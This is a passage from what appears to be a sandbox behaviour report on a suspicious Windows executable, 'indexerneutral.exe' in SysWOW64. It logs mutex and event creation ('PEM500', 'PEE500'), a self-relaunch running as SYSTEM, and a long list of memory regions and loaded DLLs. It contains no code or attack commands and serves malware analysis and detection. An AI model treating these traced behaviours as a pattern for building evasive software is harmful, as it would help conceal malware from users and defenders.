_Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEM500") returned 6 [0210.430] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEM500") returned 0xcc [0210.430] _snwprintf (in: _Dest=0x19fee0, _Count=0x40, _Format="PEE%X" | out: _Dest="PEE500") returned 6 [0210.431] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="PEE500") returned 0xd0 [0210.431] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fc58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0210.431] CreateProcessW (in: lpApplicationName="C:\\Windows\\SysWOW64\\indexerneutral.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x80, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fbe0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fc28 | out: lpCommandLine=0x0, lpProcessInformation=0x19fc28*(hProcess=0xd8, hThread=0xd4, dwProcessId=0x6cc, dwThreadId=0x6d0)) returned 1 [0210.438] WaitForSingleObject (hHandle=0xd0, dwMilliseconds=0xffffffff) returned 0x0 [0211.222] CloseHandle (hObject=0xd8) returned 1 [0211.222] CloseHandle (hObject=0xd4) returned 1 [0211.222] CloseHandle (hObject=0xd0) returned 1 [0211.223] CloseHandle (hObject=0xcc) returned 1 [0211.223] ExitProcess (uExitCode=0x0) Thread: id = 500 os_tid = 0x6a4 Process: id = "25" image_name = "indexerneutral.exe" filename = "c:\\windows\\syswow64\\indexerneutral.exe" page_root = "0x1a043000" os_pid = "0x6cc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x500" cmd_line = "\"C:\\Windows\\SysWOW64\\indexerneutral.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 3678 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3679 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3680 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3681 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3682 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3683 start_va = 0x400000 end_va = 0x470fff entry_point = 0x400000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3684 start_va = 0x77510000 end_va = 0x77688fff entry_point = 0x77510000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3685 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3686 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3687 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 3688 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3689 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3690 start_va = 0x7fff0000 end_va = 0x7fff9f1bffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3691 start_va = 0x7fff9f1c0000 end_va = 0x7fff9f381fff entry_point = 0x7fff9f1c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3692 start_va = 0x7fff9f382000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007fff9f382000" filename = "" Region: id = 3693 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3694 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3695 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 3696 start_va = 0x72130000 end_va = 0x721a2fff entry_point = 0x72130000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3697 start_va = 0x721b0000 end_va = 0x721fefff entry_point = 0x721b0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3698 start_va = 0x72200000 end_va = 0x72207fff entry_point = 0x72200000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3699 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3700 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3701 start_va = 0x1c0000 end_va = 0x27dfff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3702 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 3703 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3704 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 3705 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3706 start_va = 0x5f0000 end_va = 0x777fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 3707 start_va = 0x780000 end_va = 0x900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3708 start_va = 0x910000 end_va = 0x9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 3709 start_va = 0xb30000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 3710 start_va = 0x745b0000 end_va = 0x74608fff entry_point = 0x745b0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3711 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3712 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3713 start_va = 0x74640000 end_va = 0x746ebfff entry_point = 0x74640000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3714 start_va = 0x75e60000 end_va = 0x75f1dfff entry_point = 0x75e60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3715 start_va = 0x760f0000 end_va = 0x7616afff entry_point = 0x760f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3716 start_va = 0x76210000 end_va = 0x76252fff entry_point = 0x76210000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3717 start_va = 0x76320000 end_va = 0x76495fff entry_point = 0x76320000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3718 start_va = 0x764c0000 end_va = 0x765dffff entry_point = 0x764c0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3719 start_va = 0x765f0000 end_va = 0x766dffff entry_point = 0x765f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3720 start_va = 0x76af0000 end_va = 0x76c3cfff entry_point = 0x76af0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3721 start_va = 0x77310000 end_va = 0x7744ffff entry_point = 0x77310000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3722 start_va = 0x774e0000 end_va = 0x7750afff entry_point = 0x774e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3723 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3724 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3725 start_va = 0x480000 end_va = 0x494fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3726 start_va = 0x4a0000 end_va = 0x4b3fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 3727 start_va = 0x4c0000 end_va = 0x4d9fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3728 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3729 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 3730 start_va = 0x9d0000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 3731 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3732 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3733 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3734 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3735 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3736 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3737 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3738 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3739 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3740 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3741 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3742 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3743 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3744 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3745 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3746 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3747 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3748 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3749 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3750 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3751 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3752 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3753 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3754 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3755 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3756 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3757 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3758 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3759 start_va = 0x74790000 end_va = 0x75b4efff entry_point = 0x74790000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3760 start_va = 0x76c50000 end_va = 0x7712cfff entry_point = 0x76c50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3761 start_va = 0x75ca0000 end_va = 0x75e59fff entry_point = 0x75ca0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3762 start_va = 0x76aa0000 end_va = 0x76ae3fff entry_point = 0x76aa0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3763 start_va = 0x76c40000 end_va = 0x76c4bfff entry_point = 0x76c40000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3764 start_va = 0x77450000 end_va = 0x774dcfff entry_point = 0x77450000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3765 start_va = 0x760a0000 end_va = 0x760e3fff entry_point = 0x760a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3766 start_va = 0x765e0000 end_va = 0x765eefff entry_point = 0x765e0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3767 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3768 start_va = 0xb40000 end_va = 0xbaefff entry_point = 0xb40000 region_type = mapped_file name = "indexerneutral.exe" filename = "\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe") Region: id = 3769 start_va = 0xb40000 end_va = 0xe76fff entry_point = 0xb40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3770 start_va = 0x77130000 end_va = 0x772a4fff entry_point = 0x77130000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3771 start_va = 0x76200000 end_va = 0x7620dfff entry_point = 0x76200000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3772 start_va = 0x74450000 end_va = 0x745affff entry_point = 0x74450000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3773 start_va = 0x74180000 end_va = 0x74440fff entry_point = 0x74180000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3774 start_va = 0x74160000 end_va = 0x74178fff entry_point = 0x74160000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 3775 start_va = 0x73f30000 end_va = 0x74153fff entry_point = 0x73f30000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3776 start_va = 0x73f20000 end_va = 0x73f2efff entry_point = 0x73f20000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 3777 start_va = 0x73f00000 end_va = 0x73f12fff entry_point = 0x73f00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3778 start_va = 0x73ee0000 end_va = 0x73efafff entry_point = 0x73ee0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3779 start_va = 0x73eb0000 end_va = 0x73edefff entry_point = 0x73eb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3780 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3781 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3782 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3783 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3784 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3785 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3786 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3787 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3788 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3789 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3790 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3791 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3792 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3793 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3794 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3795 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3796 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3797 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3798 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3799 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3800 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3801 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3802 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3803 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3804 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3805 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3806 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3807 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3808 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3809 start_va = 0x746f0000 end_va = 0x74781fff entry_point = 0x746f0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3810 start_va = 0xe80000 end_va = 0xf68fff entry_point = 0xe80000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3811 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x3f0000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\syswow64\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 3812 start_va = 0x76a40000 end_va = 0x76a9bfff entry_point = 0x76a40000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3813 start_va = 0x766f0000 end_va = 0x766f6fff entry_point = 0x766f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3814 start_va = 0x73e90000 end_va = 0x73ea0fff entry_point = 0x73e90000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 3815 start_va = 0x73e60000 end_va = 0x73e8ffff entry_point = 0x73e60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3816 start_va = 0x73e50000 end_va = 0x73e57fff entry_point = 0x73e50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3817 start_va = 0x73da0000 end_va = 0x73e46fff entry_point = 0x73da0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3818 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3819 start_va = 0xad0000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 3820 start_va = 0xe80000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 3821 start_va = 0xf80000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 3822 start_va = 0x73d50000 end_va = 0x73d9dfff entry_point = 0x73d50000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3823 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 3824 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 3826 start_va = 0x1080000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 3827 start_va = 0x10c0000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 3828 start_va = 0x73cc0000 end_va = 0x73d43fff entry_point = 0x73cc0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 3829 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 3830 start_va = 0x460000 end_va = 0x461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3831 start_va = 0x73ab0000 end_va = 0x73cb8fff entry_point = 0x73ab0000 region_type = mapped_file name = 